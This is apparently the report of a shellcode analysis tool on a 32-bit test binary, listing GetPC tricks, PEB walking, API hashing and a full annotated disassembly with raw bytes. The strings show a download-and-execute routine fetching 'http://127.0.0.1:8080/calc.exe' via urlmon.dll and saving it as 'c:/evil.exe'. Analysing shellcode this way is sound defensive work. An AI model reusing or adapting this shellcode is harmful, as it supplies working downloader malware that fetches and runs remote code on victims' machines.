Filename: calltest.bin
File Type: rawHex
Bits: 32
Date Analyzed: 2022-01-02 14:38:14
Seconds since last epoch: 1641155894.929375

Section info

Shellcode Entry point: 0x0

No strings found.


***********
Push ret
***********

********************************************************************************************************
Push ret Item: 0 | Section: -1 | Section name: rawHex | PUSH Offset: 0x179, ebx | RET Offset: 0x17a
0x179      push ebx 
0x17a      ret   
********************************************************************************************************
Push ret Item: 1 | Section: -1 | Section name: rawHex | PUSH Offset: 0x175, edx | RET Offset: 0x176
0x175      push edx 
0x176      ret   
********************************************************************************************************
Push ret Item: 2 | Section: -1 | Section name: rawHex | PUSH Offset: 0x177, edx | RET Offset: 0x178
0x177      push edx 
0x178      ret   
********************************************************************************************************
Push ret Item: 3 | Section: -1 | Section name: rawHex | PUSH Offset: 0x1a2, ebx | RET Offset: 0x1a3
0x1a2      push ebx 
0x1a3      ret   
********************************************************************************************************
Push ret Item: 4 | Section: -1 | Section name: rawHex | PUSH Offset: 0x1c8, ebx | RET Offset: 0x1c9
0x1c8      push ebx 
0x1c9      ret   
********************************************************************************************************
Push ret Item: 5 | Section: -1 | Section name: rawHex | PUSH Offset: 0x1a4, edx | RET Offset: 0x1a5
0x1a4      push edx 
0x1a5      ret   


***********
Fstenv
***********

********************************************************************************************************
Fstenv Item: 0 | Section: -1 | Section name: rawHex | FPU Offset: 0xcd | FSTENV Offset: 0xd4
0xcd       fsqrt  
0xcf       nop   
0xd0       nop   
0xd1       nop   
0xd2       nop   
0xd3       wait  
0xd4       fnstenv [esp + 4] 
********************************************************************************************************
Fstenv Item: 1 | Section: -1 | Section name: rawHex | FPU Offset: 0x86 | FSTENV Offset: 0x8a
0x86       fsqrt  
0x88       nop   
0x89       nop   
0x8a       fnstenv [esp + 4] 
********************************************************************************************************
Fstenv Item: 2 | Section: -1 | Section name: rawHex | FPU Offset: 0x109 | FSTENV Offset: 0x114
0x109      fldpi  
0x10b      mov  eax, 0x42 
0x110      add  eax, 0x20 
0x113      wait  
0x114      fnstenv [eax] 


***********
Call Pop
***********

********************************************************************************************************
Call pop Item: 0 | Section: -1 | Section name: rawHex
0x18c      call 0x191 
0x191      pop  eax 
********************************************************************************************************
Call pop Item: 1 | Section: -1 | Section name: rawHex
0x1be      call 0x1c6 
0x1c3      add  eax, 3 
0x1c6      pop  ebx 
********************************************************************************************************
Call pop Item: 2 | Section: -1 | Section name: rawHex
0x3c       call 0x41 
0x41       pop  edx 

No syscall instructions found.


***************
Walking the PEB
***************

********************************************************************************************************
PEB Item: 0 | Points: 3 | Section: -1 | Section name: rawHex
0x119      mov  edi, dword ptr fs:[0x30] 
0x120      mov  edi, dword ptr [edi + 0xc] 
0x123      jmp  0x12d 
0x125      mov  edi, dword ptr [edi + 0x14] 
0x128      mov  esi, dword ptr [edi + 0x28] 
********************************************************************************************************
PEB Item: 1 | Points: 4 | Section: -1 | Section name: rawHex
0x197      mov  ebp, dword ptr fs:[eax + 0x30] 
0x19b      mov  edi, dword ptr [edi + 0xc] 
0x19e      mov  edi, dword ptr [edi + 0x14] 
0x1a1      lodsd eax, dword ptr [esi] 
0x1a2      push ebx 
0x1a3      ret   
********************************************************************************************************
PEB Item: 2 | Points: 3 | Section: -1 | Section name: rawHex
0x119      mov  edi, dword ptr fs:[0x30] 
0x120      mov  edi, dword ptr [edi + 0xc] 
0x123      jmp  0x12d 
0x125      mov  edi, dword ptr [edi + 0x14] 
0x128      mov  esi, dword ptr [edi + 0x28] 
********************************************************************************************************
PEB Item: 3 | Points: 4 | Section: -1 | Section name: rawHex
0x197      mov  ebp, dword ptr fs:[eax + 0x30] 
0x19b      mov  edi, dword ptr [edi + 0xc] 
0x19e      mov  edi, dword ptr [edi + 0x14] 
0x1a1      lodsd eax, dword ptr [esi] 
0x1a2      push ebx 
0x1a3      ret   

No heaven's gate instructions found.


****************
Disassembly
****************

0x0        dec esp                             \x4c                      L         
            ; ***Shellcode Entry Point, offset 0x0***                                     
0x1        add dword ptr [ecx], eax            \x01\x01                  ..        
0x3        add byte ptr [ecx + 0x7f], ah       \x00\x61\x7f              .a.       
0x6        adc dword ptr [eax + 5], esp        \x11\x60\x05              .`.       
0x9        add eax, dword ptr [eax]            \x03\x00                  ..        
0xb        add byte ptr [ecx], ah              \x00\x21                  .!        
0xd        add byte ptr [eax], al              \x00\x00                  ..        
0xf        add byte ptr [eax], al              \x00\x00                  ..        
0x11       align 0x3                          \x00\x00\x00                        
0x14       db 0x2e (!)                        \x2e                      .         
0x15       db 0x74 (!)                        \x74                      t         
0x16       db 0x65 (!)                        \x65                      e         
0x17       db 0x78 (!)                        \x78                      x         
0x18       db 0x74 (!)                        \x74                      t         
0x19       db 0x00 (!)                        \x00                      .         
0x1a       db 0x00 (!)                        \x00                      .         
0x1b       db 0x00 (!)                        \x00                      .         
0x1c       db 0x00 (!)                        \x00                      .         
*B0x1d       db 0x00 (!)                        \x00                      .         
0x1d       align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x24       inc edi                             \x47                      G         
0x25       add al, byte ptr [eax]              \x02\x00                  ..        
0x27       add byte ptr [eax + eax], bh        \x00\x3c\x00              .<.       
0x2a       add byte ptr [eax], al              \x00\x00                  ..        
0x2c       add dword ptr [edx], 0              \x83\x02\x00              ...       
0x2f       add byte ptr [eax], al              \x00\x00                  ..        
0x31       db 0x00                             \x00                      .         
0x32       align 0x2                          \x00\x00                            
0x34       or eax, 0x20000000                  \x0d\x00\x00\x00\x20      ....      
0x39       add byte ptr [eax + 0x60], dl       \x00\x50\x60              .P`       
0x3c       call 0x41                           \xe8\x00\x00\x00\x00      .....     
	 label_0x41:
0x41       pop edx                             \x5a                      Z         
            ; GetPC                                                                
0x42       lea edx, [edx - 5]                  \x8d\x52\xfb              .R.       
0x45       mov ebp, esp                        \x89\xe5                  ..        
0x47       sub esp, 0x1000                     \x81\xec\x00\x10\x00\x00  ......    
0x4d       push edx                            \x52                      R         
0x4e       mov ebx, 0x4b1ffe8e                 \xbb\x8e\xfe\x1f\x4b      ....K     
0x53       call 0x116                          \xe8\xbe\x00\x00\x00      .....     
0x58       pop edx                             \x5a                      Z         
0x59       push ebp                            \x55                      U         
0x5a       push edx                            \x52                      R         
0x5b       mov ebp, eax                        \x89\xc5                  ..        
0x5d       lea esi, [edx + 0x1d2]              \x8d\xb2\xd2\x01\x00\x00  ......    
0x63       lea edi, [edx + 0x1de]              \x8d\xba\xde\x01\x00\x00  ......    
0x69       call 0x14e                          \xe8\xe0\x00\x00\x00      .....     
0x6e       pop edx                             \x5a                      Z         
0x6f       pop ebp                             \x5d                      ]         
0x70       push ebp                            \x55                      U         
0x71       push edx                            \x52                      R         
0x72       lea esi, [edx + 0x19c]              \x8d\xb2\x9c\x01\x00\x00  ......    
0x78       push esi                            \x56                      V         
0x79       push dword ptr [edx + 0x1e2]        \xff\xb2\xe2\x01\x00\x00  ......    
0x7f       pop eax                             \x58                      X         
0x80       call eax                            \xff\xd0                  ..        
0x82       pop edx                             \x5a                      Z         
0x83       pop ebp                             \x5d                      ]         
0x84       nop                                 \x90                      .         
0x85       nop                                 \x90                      .         
0x86       fsqrt                               \xd9\xfa                  ..        
            ; floating point to set up GetPC                                       
0x88       nop                                 \x90                      .         
0x89       nop                                 \x90                      .         
0x8a       fnstenv [esp + 4]                   \xd9\x74\x24\x04          .t$.      
            ; GetPC                                                                
0x8e       push ebp                            \x55                      U         
0x8f       push edx                            \x52                      R         
0x90       mov ebp, eax                        \x89\xc5                  ..        
0x92       lea esi, [edx + 0x1e6]              \x8d\xb2\xe6\x01\x00\x00  ......    
0x98       lea edi, [edx + 0x1ee]              \x8d\xba\xee\x01\x00\x00  ......    
0x9e       call 0x14e                          \xe8\xab\x00\x00\x00      .....     
0xa3       pop edx                             \x5a                      Z         
0xa4       pop ebp                             \x5d                      ]         
0xa5       wait                                \x9b                      .         
0xa6       fnstenv [ecx + 0xc]                 \xd9\x71\x0c              .q.       
0xa9       fnstenv [ebp + 7]                   \xd9\x75\x07              .u.       
0xac       push ebp                            \x55                      U         
0xad       push edx                            \x52                      R         
0xae       push 0                              \x6a\x00                  j.        
0xb0       push 0                              \x6a\x00                  j.        
0xb2       lea esi, [edx + 0x1a7]              \x8d\xb2\xa7\x01\x00\x00  ......    
0xb8       push esi                            \x56                      V         
0xb9       lea esi, [edx + 0x1b3]              \x8d\xb2\xb3\x01\x00\x00  ......    
0xbf       push esi                            \x56                      V         
0xc0       push 0                              \x6a\x00                  j.        
0xc2       push dword ptr [edx + 0x1ee]        \xff\xb2\xee\x01\x00\x00  ......    
0xc8       pop eax                             \x58                      X         
0xc9       call eax                            \xff\xd0                  ..        
0xcb       pop edx                             \x5a                      Z         
0xcc       pop ebp                             \x5d                      ]         
0xcd       fsqrt                               \xd9\xfa                  ..        
            ; floating point to set up GetPC                                       
0xcf       nop                                 \x90                      .         
0xd0       nop                                 \x90                      .         
0xd1       nop                                 \x90                      .         
0xd2       nop                                 \x90                      .         
0xd3       wait                                \x9b                      .         
0xd4       fnstenv [esp + 4]                   \xd9\x74\x24\x04          .t$.      
            ; GetPC                                                                
0xd8       push ebp                            \x55                      U         
0xd9       push edx                            \x52                      R         
0xda       lea esi, [edx + 0x1f2]              \x8d\xb2\xf2\x01\x00\x00  ......    
0xe0       push esi                            \x56                      V         
0xe1       lea esi, [edx + 0x202]              \x8d\xb2\x02\x02\x00\x00  ......    
0xe7       push esi                            \x56                      V         
0xe8       push 0                              \x6a\x00                  j.        
0xea       push 0                              \x6a\x00                  j.        
0xec       push 0                              \x6a\x00                  j.        
0xee       push 0                              \x6a\x00                  j.        
0xf0       push 0                              \x6a\x00                  j.        
0xf2       push 0                              \x6a\x00                  j.        
0xf4       lea esi, [edx + 0x1a7]              \x8d\xb2\xa7\x01\x00\x00  ......    
0xfa       push esi                            \x56                      V         
0xfb       push 0                              \x6a\x00                  j.        
0xfd       push dword ptr [edx + 0x1de]        \xff\xb2\xde\x01\x00\x00  ......    
0x103      pop eax                             \x58                      X         
0x104      call eax                            \xff\xd0                  ..        
0x106      pop edx                             \x5a                      Z         
0x107      pop ebp                             \x5d                      ]         
0x108      ret                                 \xc3                      .         

0x109      fldpi                               \xd9\xeb                  ..        
            ; floating point to set up GetPC                                       
0x10b      mov eax, 0x42                       \xb8\x42\x00\x00\x00      .B...     
0x110      add eax, 0x20                       \x83\xc0\x20              ..        
0x113      wait                                \x9b                      .         
0x114      fnstenv [eax]                       \xd9\x30                  .0        
            ; GetPC                                                                
	 label_0x116:
0x116      cld                                 \xfc                      .         
0x117      xor edi, edi                        \x31\xff                  1.        
0x119      mov edi, dword ptr fs:[0x30]        \x64\x8b\x3d\x30\x00\x00\x00d.=0...   
           ; load TIB                                                              
0x120      mov edi, dword ptr [edi + 0xc]      \x8b\x7f\x0c              ...       
           ; load PEB_LDR_DATA LoaderData                                          
0x123      jmp 0x12d                           \xeb\x08                  ..        

0x125      mov edi, dword ptr [edi + 0x14]     \x8b\x7f\x14              ...       
           ; LIST_ENTRY InMemoryOrderModuleList                                     
	 label_0x128:
0x128      mov esi, dword ptr [edi + 0x28]     \x8b\x77\x28              .w(       
0x12b      xor edx, edx                        \x31\xd2                  1.        
	 label_0x12d:
0x12d      lodsw ax, word ptr [esi]            \x66\xad                  f.        
0x12f      test al, al                         \x84\xc0                  ..        
0x131      je 0x144                            \x74\x11                  t.        

0x133      cmp al, 0x41                        \x3c\x41                  <A        
0x135      jb 0x13d                            \x72\x06                  r.        

0x137      cmp al, 0x5a                        \x3c\x5a                  <Z        
0x139      ja 0x13d                            \x77\x02                  w.        

0x13b      or al, 0x20                         \x0c\x20                  .         
	 label_0x13d:
0x13d      rol edx, 7                          \xc1\xc2\x07              ...       
0x140      xor dl, al                          \x30\xc2                  0.        
0x142      jmp 0x12d                           \xeb\xe9                  ..        

	 label_0x144:
0x144      cmp edx, ebx                        \x39\xda                  9.        
0x146      mov eax, dword ptr [edi + 0x10]     \x8b\x47\x10              .G.       
0x149      mov edi, dword ptr [edi]            \x8b\x3f                  .?        
0x14b      jne 0x128                           \x75\xdb                  u.        

0x14d      ret                                 \xc3                      .         

	 label_0x14e:
0x14e      mov edx, ebp                        \x89\xea                  ..        
0x150      add edx, dword ptr [edx + 0x3c]     \x03\x52\x3c              .R<       
0x153      mov edx, dword ptr [edx + 0x78]     \x8b\x52\x78              .Rx       
0x156      add edx, ebp                        \x01\xea                  ..        
0x158      mov ebx, dword ptr [edx + 0x20]     \x8b\x5a\x20              .Z        
0x15b      add ebx, ebp                        \x01\xeb                  ..        
0x15d      xor ecx, ecx                        \x31\xc9                  1.        
	 label_0x15f:
0x15f      push edi                            \x57                      W         
0x160      push esi                            \x56                      V         
0x161      mov esi, dword ptr [esi]            \x8b\x36                  .6        
	 label_0x163:
0x163      mov edi, dword ptr [ebx]            \x8b\x3b                  .;        
0x165      add edi, ebp                        \x01\xef                  ..        
0x167      push edx                            \x52                      R         
0x168      xor edx, edx                        \x31\xd2                  1.        
	 label_0x16a:
0x16a      rol edx, 7                          \xc1\xc2\x07              ...       
0x16d      xor dl, byte ptr [edi]              \x32\x17                  2.        
0x16f      inc edi                             \x47                      G         
0x170      cmp byte ptr [edi], 0               \x80\x3f\x00              .?.       
0x173      jne 0x16a                           \x75\xf5                  u.        

0x175      push edx                            \x52                      R         
           ; pushing return address                                                
0x176      ret                                 \xc3                      .         
           ; returning to edx                                                      

0x177      push edx                            \x52                      R         
           ; pushing return address                                                
0x178      ret                                 \xc3                      .         
           ; returning to edx                                                      

0x179      push ebx                            \x53                      S         
           ; pushing return address                                                
0x17a      ret                                 \xc3                      .         
           ; returning to ebx                                                      

0x17b      xchg eax, edx                       \x92                      .         
0x17c      pop edx                             \x5a                      Z         
0x17d      cmp eax, esi                        \x39\xf0                  9.        
0x17f      je 0x193                            \x74\x12                  t.        

0x181      add ebx, 4                          \x83\xc3\x04              ...       
0x184      inc ecx                             \x41                      A         
0x185      cmp dword ptr [edx + 0x18], ecx     \x39\x4a\x18              9J.       
0x188      jne 0x163                           \x75\xd9                  u.        

0x18a      pop esi                             \x5e                      ^         
0x18b      pop edi                             \x5f                      _         
0x18c      call 0x191                          \xe8\x00\x00\x00\x00      .....     
	 label_0x191:
0x191      pop eax                             \x58                      X         
            ; GetPC                                                                
0x192      ret                                 \xc3                      .         

	 label_0x193:
0x193      pop esi                             \x5e                      ^         
0x194      pop edi                             \x5f                      _         
0x195      lodsd eax, dword ptr [esi]          \xad                      .         
0x196      push esi                            \x56                      V         
0x197      mov ebp, dword ptr fs:[eax + 0x30]  \x64\x8b\x68\x30          d.h0      
           ; load TIB                                                              
0x19b      mov edi, dword ptr [edi + 0xc]      \x8b\x7f\x0c              ...       
           ; load PEB_LDR_DATA LoaderData                                          
0x19e      mov edi, dword ptr [edi + 0x14]     \x8b\x7f\x14              ...       
           ; LIST_ENTRY InMemoryOrderModuleList                                     
0x1a1      lodsd eax, dword ptr [esi]          \xad                      .         
           ; advancing DLL flink                                                   
0x1a2      push ebx                            \x53                      S         
           ; pushing return address                                                
0x1a3      ret                                 \xc3                      .         
           ; returning to ebx                                                      

0x1a4      push edx                            \x52                      R         
           ; pushing return address                                                
0x1a5      ret                                 \xc3                      .         
           ; returning to edx                                                      

0x1a6      mov ebx, ebp                        \x89\xeb                  ..        
0x1a8      mov esi, ebx                        \x89\xde                  ..        
0x1aa      add ebx, dword ptr [edx + 0x24]     \x03\x5a\x24              .Z$       
0x1ad      lea eax, [ebx + ecx*2]              \x8d\x04\x4b              ..K       
0x1b0      movzx eax, word ptr [eax]           \x0f\xb7\x00              ...       
0x1b3      lea eax, [esi + eax*4]              \x8d\x04\x86              ...       
0x1b6      add eax, dword ptr [edx + 0x1c]     \x03\x42\x1c              .B.       
0x1b9      mov eax, dword ptr [eax]            \x8b\x00                  ..        
0x1bb      add eax, esi                        \x01\xf0                  ..        
0x1bd      stosd dword ptr es:[edi], eax       \xab                      .         
0x1be      call 0x1c6                          \xe8\x03\x00\x00\x00      .....     
0x1c3      add eax, 3                          \x83\xc0\x03              ...       
	 label_0x1c6:
0x1c6      pop ebx                             \x5b                      [         
            ; GetPC                                                                
0x1c7      pop ebx                             \x5b                      [         
0x1c8      push ebx                            \x53                      S         
           ; pushing return address                                                
0x1c9      ret                                 \xc3                      .         
           ; returning to ebx                                                      

0x1ca      pop esi                             \x5e                      ^         
0x1cb      add ebx, 4                          \x83\xc3\x04              ...       
0x1ce      inc ecx                             \x41                      A         
0x1cf      cmp dword ptr [esi], 0xffff         \x81\x3e\xff\xff\x00\x00  .>....    
0x1d5      jne 0x15f                           \x75\x88                  u.        

0x1d7      ret                                 \xc3                      .         

0x1d8      urlmon.dll ; string                \x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c          
0x1e2      db 0x00                             \x00                      .         
0x1e3      c:/evil.exe ; string               \x63\x3a\x2f\x65\x76\x69\x6c\x2e\x65\x78\x65          
0x1ee      db 0x00                             \x00                      .         
0x1ef      http://127.0.0.1:8080/calc.exe ; string\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x63\x61\x6c\x63\x2e\x65\x78\x65          
0x20d      add bh, al                          \x00\xc7                  ..        
0x20f      mov dh, byte ptr [ecx]              \x8a\x31                  .1        
0x211      inc esi                             \x46                      F         
0x212      sub byte ptr es:[eax + ecx*8 + 0xffff], 1 \x26\x80\xac\xc8\xff\xff\x00\x00\x01&........ 
0x21b      add byte ptr [eax], al              \x00\x00                  ..        
0x21d      add byte ptr [edx], al              \x00\x02                  ..        
0x21f      add byte ptr [eax], al              \x00\x00                  ..        
0x221      add byte ptr [ecx - 0x26a2dd], bl   \x00\x99\x23\x5d\xd9\xff  ..#]..    
0x227      inc dword ptr [eax]                 \xff\x00                  ..        
0x229      add byte ptr [ebx], al              \x00\x03                  ..        
0x22b      add byte ptr [eax], al              \x00\x00                  ..        
0x22d      add byte ptr [eax], al              \x00\x00                  ..        
0x22f      align 0x50                         \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00          
0x27f      add dword ptr [eax], eax            \x01\x00                  ..        
0x281      add byte ptr [eax], al              \x00\x00                  ..        
0x283      and eax, dword ptr [eax]            \x23\x00                  #.        
0x285      add byte ptr [eax], al              \x00\x00                  ..        
0x287      add al, byte ptr [eax]              \x02\x00                  ..        
0x289      add byte ptr [eax], al              \x00\x00                  ..        
0x28b      push es                             \x06                      .         
0x28c      add byte ptr [ecx], ch              \x00\x29                  .)        
0x28e      add byte ptr [eax], al              \x00\x00                  ..        
0x290      add byte ptr [edx], al              \x00\x02                  ..        
0x292      add byte ptr [eax], al              \x00\x00                  ..        
0x294      add byte ptr [esi], al              \x00\x06                  ..        
0x296      add byte ptr [eax], bh              \x00\x38                  .8        
0x298      add byte ptr [eax], al              \x00\x00                  ..        
0x29a      add byte ptr [edx], al              \x00\x02                  ..        
0x29c      add byte ptr [eax], al              \x00\x00                  ..        
0x29e      add byte ptr [esi], al              \x00\x06                  ..        
0x2a0      add byte ptr [edi], bh              \x00\x3f                  .?        
0x2a2      add byte ptr [eax], al              \x00\x00                  ..        
0x2a4      add byte ptr [edx], al              \x00\x02                  ..        
0x2a6      add byte ptr [eax], al              \x00\x00                  ..        
0x2a8      add byte ptr [esi], al              \x00\x06                  ..        
0x2aa      add byte ptr [eax], bl              \x00\x58\x00              .X.       
0x2ad      add byte ptr [eax], al              \x00\x00                  ..        
0x2af      add al, byte ptr [eax]              \x02\x00                  ..        
0x2b1      add byte ptr [eax], al              \x00\x00                  ..        
0x2b3      push es                             \x06                      .         
0x2b4      add byte ptr [esi], bl              \x00\x5e\x00              .^.       
0x2b7      add byte ptr [eax], al              \x00\x00                  ..        
0x2b9      add al, byte ptr [eax]              \x02\x00                  ..        
0x2bb      add byte ptr [eax], al              \x00\x00                  ..        
0x2bd      push es                             \x06                      .         
0x2be      add byte ptr [eax], bh              \x00\x78\x00              .x.       
0x2c1      add byte ptr [eax], al              \x00\x00                  ..        
0x2c3      add al, byte ptr [eax]              \x02\x00                  ..        
0x2c5      add byte ptr [eax], al              \x00\x00                  ..        
0x2c7      push es                             \x06                      .         
0x2c8      add byte ptr [edi], bh              \x00\x7f\x00              ...       
0x2cb      add byte ptr [eax], al              \x00\x00                  ..        
0x2cd      add al, byte ptr [eax]              \x02\x00                  ..        
0x2cf      add byte ptr [eax], al              \x00\x00                  ..        
0x2d1      push es                             \x06                      .         
0x2d2      add byte ptr [eax + 0x2000000], cl  \x00\x88\x00\x00\x00\x02  ......    
0x2d8      add byte ptr [eax], al              \x00\x00                  ..        
0x2da      add byte ptr [esi], al              \x00\x06                  ..        
0x2dc      add byte ptr [eax + 0x2000000], ah  \x00\xa0\x00\x00\x00\x02  ......    
0x2e2      add byte ptr [eax], al              \x00\x00                  ..        
0x2e4      add byte ptr [esi], al              \x00\x06                  ..        
0x2e6      add byte ptr [edi + 0x2000000], ah  \x00\xa7\x00\x00\x00\x02  ......    
0x2ec      add byte ptr [eax], al              \x00\x00                  ..        
0x2ee      add byte ptr [esi], al              \x00\x06                  ..        
0x2f0      add byte ptr [edx + 0x2000000], bh  \x00\xba\x00\x00\x00\x02  ......    
0x2f6      add byte ptr [eax], al              \x00\x00                  ..        
0x2f8      add byte ptr [esi], al              \x00\x06                  ..        
0x2fa      add bl, al                          \x00\xc3                  ..        
0x2fc      add byte ptr [eax], al              \x00\x00                  ..        
0x2fe      add byte ptr [edx], al              \x00\x02                  ..        
0x300      add byte ptr [eax], al              \x00\x00                  ..        
0x302      add byte ptr [esi], al              \x00\x06                  ..        
0x304      add byte ptr [esi], ch              \x00\x2e                  ..        
0x306      imul bp, word ptr [ebp], 0          \x66\x69\x6c\x65\x00\x00\x00file...   
0x30d      db 0x00                             \x00                      .         
0x30e      align 0x3                          \x00\x00\x00                        
0x311      db 0xfe                             \xfe                      .         
0x312      inc dword ptr [eax]                 \xff\x00                  ..        
0x314      add byte ptr [edi + 1], ah          \x00\x67\x01              .g.       
0x317      work.asm ; string                  \x77\x6f\x72\x6b\x2e\x61\x73\x6d          
0x31f      add byte ptr [eax], al              \x00\x00                  ..        
0x321      add byte ptr [eax], al              \x00\x00                  ..        
0x323      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x329      db 0x2e (!)                        \x2e                      .         
0x32a      db 0x74 (!)                        \x74                      t         
0x32b      db 0x65 (!)                        \x65                      e         
0x32c      js 0x3a2                            \x78\x74                  xt        

0x32e      add byte ptr [eax], al              \x00\x00                  ..        
0x330      add byte ptr [eax], al              \x00\x00                  ..        
0x332      align 0x3                          \x00\x00\x00                        
0x335      add dword ptr [eax], eax            \x01\x00                  ..        
0x337      add byte ptr [eax], al              \x00\x00                  ..        
0x339      add eax, dword ptr [ecx]            \x03\x01                  ..        
0x33b      inc edi                             \x47                      G         
0x33c      add al, byte ptr [eax]              \x02\x00                  ..        
0x33e      add byte ptr [0], cl                \x00\x0d\x00\x00\x00\x00  ......    
0x344      align 0x9                          \x00\x00\x00\x00\x00\x00\x00\x00\x00          
0x34d      db 0x2e                             \x2e                      .         
0x34e      absolut ; string                   \x61\x62\x73\x6f\x6c\x75\x74          
0x355      add byte ptr [eax], al              \x00\x00                  ..        
0x357      add byte ptr [eax], al              \x00\x00                  ..        
0x359      db 0xff                             \xff                      .         
0x35a      inc dword ptr [eax]                 \xff\x00                  ..        
0x35c      add byte ptr [ebx], al              \x00\x03                  ..        
0x35e      add byte ptr [eax], al              \x00\x00                  ..        
0x360      add byte ptr [eax], al              \x00\x00                  ..        
0x362      db 0x00                             \x00                      .         
0x363      add al, 0                           \x04\x00                  ..        
0x365      add byte ptr [eax], al              \x00\x00                  ..        
0x367      db 0x00                             \x00                      .         
0x368      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x36f      add al, byte ptr [eax]              \x02\x00                  ..        
0x371      geteip ; string                    \x67\x65\x74\x65\x69\x70            
0x377      add byte ptr [eax], al              \x00\x00                  ..        
0x379      add byte ptr [eax], al              \x00\x00                  ..        
0x37b      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x381      add al, byte ptr [eax]              \x02\x00                  ..        
0x383      add byte ptr [eax], al              \x00\x00                  ..        
0x385      db 0x00                             \x00                      .         
	 label_0x386:
0x386      db 0x00                             \x00                      .         
0x387      adc eax, dword ptr [eax]            \x13\x00                  ..        
0x389      add byte ptr [eax], al              \x00\x00                  ..        
0x38b      db 0x00                             \x00                      .         
0x38c      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x393      add al, byte ptr [eax]              \x02\x00                  ..        
0x395      add byte ptr [eax], al              \x00\x00                  ..        
0x397      db 0x00                             \x00                      .         
0x398      db 0x00                             \x00                      .         
0x399      add byte ptr es:[eax], al           \x26\x00\x00              &..       
0x39c      add byte ptr [eax], al              \x00\x00                  ..        
0x39e      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x3a5      add al, byte ptr [eax]              \x02\x00                  ..        
0x3a7      add byte ptr [eax], al              \x00\x00                  ..        
0x3a9      db 0x00                             \x00                      .         
0x3aa      db 0x00                             \x00                      .         
0x3ab      aaa                                 \x37                      7         
0x3ac      add byte ptr [eax], al              \x00\x00                  ..        
0x3ae      add byte ptr [eax], al              \x00\x00                  ..        
0x3b0      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x3b7      add al, byte ptr [eax]              \x02\x00                  ..        
0x3b9      add byte ptr [eax], al              \x00\x00                  ..        
0x3bb      db 0x00                             \x00                      .         
0x3bc      db 0x00                             \x00                      .         
0x3bd      dec eax                             \x48                      H         
0x3be      add byte ptr [eax], al              \x00\x00                  ..        
0x3c0      add byte ptr [eax], al              \x00\x00                  ..        
0x3c2      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
	 label_0x3c9:
0x3c9      add al, byte ptr [eax]              \x02\x00                  ..        
0x3cb      add byte ptr [eax], al              \x00\x00                  ..        
0x3cd      db 0x00                             \x00                      .         
0x3ce      db 0x00                             \x00                      .         
0x3cf      push edi                            \x57                      W         
0x3d0      add byte ptr [eax], al              \x00\x00                  ..        
0x3d2      add byte ptr [eax], al              \x00\x00                  ..        
0x3d4      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x3db      add al, byte ptr [eax]              \x02\x00                  ..        
0x3dd      add byte ptr [eax], al              \x00\x00                  ..        
0x3df      db 0x00                             \x00                      .         
0x3e0      db 0x00                             \x00                      .         
0x3e1      insb byte ptr es:[edi], dx          \x6c                      l         
0x3e2      add byte ptr [eax], al              \x00\x00                  ..        
0x3e4      add byte ptr [eax], al              \x00\x00                  ..        
0x3e6      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x3ed      add al, byte ptr [eax]              \x02\x00                  ..        
0x3ef      add byte ptr [eax], al              \x00\x00                  ..        
0x3f1      db 0x00                             \x00                      .         
0x3f2      db 0x00                             \x00                      .         
0x3f3      jl 0x3f5                            \x7c\x00                  |.        

	 label_0x3f5:
0x3f5      add byte ptr [eax], al              \x00\x00                  ..        
0x3f7      db 0x00                             \x00                      .         
0x3f8      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x3ff      add al, byte ptr [eax]              \x02\x00                  ..        
0x401      add byte ptr [eax], al              \x00\x00                  ..        
0x403      db 0x00                             \x00                      .         
0x404      db 0x00                             \x00                      .         
0x405      mov al, byte ptr [eax]              \x8a\x00                  ..        
0x407      add byte ptr [eax], al              \x00\x00                  ..        
0x409      db 0x00                             \x00                      .         
0x40a      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x411      add al, byte ptr [eax]              \x02\x00                  ..        
0x413      add byte ptr [eax], al              \x00\x00                  ..        
0x415      db 0x00                             \x00                      .         
0x416      db 0x00                             \x00                      .         
0x417      cwde                                \x98                      .         
0x418      add byte ptr [eax], al              \x00\x00                  ..        
0x41a      add byte ptr [eax], al              \x00\x00                  ..        
0x41c      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x423      add al, byte ptr [eax]              \x02\x00                  ..        
0x425      add byte ptr [eax], al              \x00\x00                  ..        
0x427      db 0x00                             \x00                      .         
0x428      db 0x00                             \x00                      .         
0x429      test eax, 0                         \xa9\x00\x00\x00\x00      .....     
0x42e      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x435      add al, byte ptr [eax]              \x02\x00                  ..        
0x437      add byte ptr [eax], al              \x00\x00                  ..        
0x439      db 0x00                             \x00                      .         
0x43a      db 0x00                             \x00                      .         
0x43b      mov bl, 0                           \xb3\x00                  ..        
0x43d      add byte ptr [eax], al              \x00\x00                  ..        
0x43f      db 0x00                             \x00                      .         
0x440      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x447      add al, byte ptr [eax]              \x02\x00                  ..        
0x449      add byte ptr [eax], al              \x00\x00                  ..        
0x44b      db 0x00                             \x00                      .         
0x44c      db 0x00                             \x00                      .         
0x44d      rol dword ptr [eax], 0              \xc1\x00\x00              ...       
0x450      add byte ptr [eax], al              \x00\x00                  ..        
0x452      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x459      add al, byte ptr [eax]              \x02\x00                  ..        
0x45b      URLMON ; string                    \x55\x52\x4c\x4d\x4f\x4e            
0x461      add byte ptr [eax], al              \x00\x00                  ..        
